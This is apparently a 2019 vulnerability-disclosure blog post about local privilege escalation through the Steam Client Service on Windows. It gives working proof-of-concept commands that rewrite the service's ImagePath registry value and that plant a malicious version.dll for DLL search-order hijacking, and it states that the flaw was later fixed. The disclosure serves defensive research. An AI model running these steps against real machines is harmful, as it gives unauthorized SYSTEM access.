Sunday, August 11, 2019

local privilege escalation via steam client service

0day on steam

Steam Client Service can be started/stopped with user access and also "HKLM\SYSTEM\CurrentControlSet\Services\Steam Client Service" is full control for the Users group. So , attacker can add reg key to get privilege access.

POC: 
reg add "HKLM\SYSTEM\CurrentControlSet\Services\Steam Client Service" /v ImagePath /d "C:\windows\system32\cmd.exe /c echo pwned > C:\0day.txt"
net start "Steam Client Service"



And also default installation path is full access for user groups. So,
version.dll which is loaded by steam client service that doesn't exist can be hijacked by transferring malicious dll file rename as version.dll to steam installation path ( C:\Program Files (x86)\Steam\bin ) .



Dll Search Order Hijacking



version.dll name not found in process monitor. So copy malicious dll to installation bin path rename as version.dll . And reg key add to value as  "C:\Program Files (x86)\Steam\bin\SteamService.exe /RunAsService"

POC: 
copy C:\testbin\malicious.dll version.dll
reg add "HKLM\SYSTEM\CurrentControlSet\Services\Steam Client Service" /v ImagePath /d "\"C:\Program Files (x86)\Steam\bin\SteamService.exe\" /RunAsService"
net start "Steam Client Service"



Rollback :
C:\Program Files (x86)\Common Files\Steam>SteamService.exe /repair && SteamService.exe /install


B00M !!! Steam gammers' hell come !!!

updated:  they updated and fixed.



Ref:
https://attack.mitre.org/techniques/T1058/
https://attack.mitre.org/techniques/T1038/



No comments:

Post a Comment

Privileged arbitrary file read (CVE-2020-16938) with The Sleuth Kit

After I read one of post from twitter which is about @jonasLyk's  CVE-2020-16938  , I've some idea to do without using 7 zip file ma...